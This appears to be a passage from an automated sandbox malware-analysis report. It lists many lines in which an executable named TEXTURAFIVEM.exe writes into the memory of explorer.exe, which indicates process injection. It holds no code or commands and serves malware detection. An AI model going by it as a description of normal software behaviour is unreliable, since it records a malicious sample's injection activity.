            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: D90000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DA0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DB0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DC0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DD0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DE0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DF0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: E00000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: E10000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3370000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4DB0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4DC0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4DD0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4DE0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4DF0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E00000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E10000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E20000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E30000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E40000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E50000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E60000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E70000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E80000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E90000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4EA0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4EB0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4EC0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4ED0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4EF0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4F00000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4F40000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4F50000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4F60000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4F70000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4F80000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4F90000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4FA0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4FB0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4FC0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4FD0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4FE0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5070000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5080000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5090000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 50A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 50B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 50C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 50D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 50E0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5170000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5180000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5190000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 51A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 51B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 51C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 51D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 51E0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5270000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5280000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5290000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 52A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 52B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 52C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 52D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 52E0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5370000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5380000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5390000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 53A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 53B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 53C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 53D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 53E0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5470000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5480000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5490000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54E0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5570000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5580000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5590000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55E0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5670000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5680000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5690000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56E0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5770000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5780000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5790000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57E0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5870000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5880000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5890000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58E0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5970000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5980000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5990000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59E0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 24010000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5A70000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5A80000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 32D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 32E0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 32F0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3380000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3390000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 33A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 33B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 33C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 33D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 33E0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 33F0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3600000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3610000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3620000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3630000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3A20000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3A30000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3A40000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3A50000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3A60000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3A70000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3A80000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3A90000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3AA0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3AB0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3AC0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3AD0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3AE0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3AF0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B00000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B10000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B20000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B30000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B40000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3B50000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5310000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5320000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5360000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5370000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5380000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5390000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 53A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 53B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 53C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5450000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5460000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5470000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5480000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 54D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5560000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5570000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5580000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5590000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 55D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5660000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5670000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5680000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5690000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 56D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5760000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5770000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5780000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5790000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5860000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5870000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5880000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5890000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 58D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5960000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5970000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5980000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5990000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59A0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59B0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59C0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 59D0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5A60000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5A70000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5A80000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5A90000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5AA0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5AB0000Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 5AC0000Jump to behavior
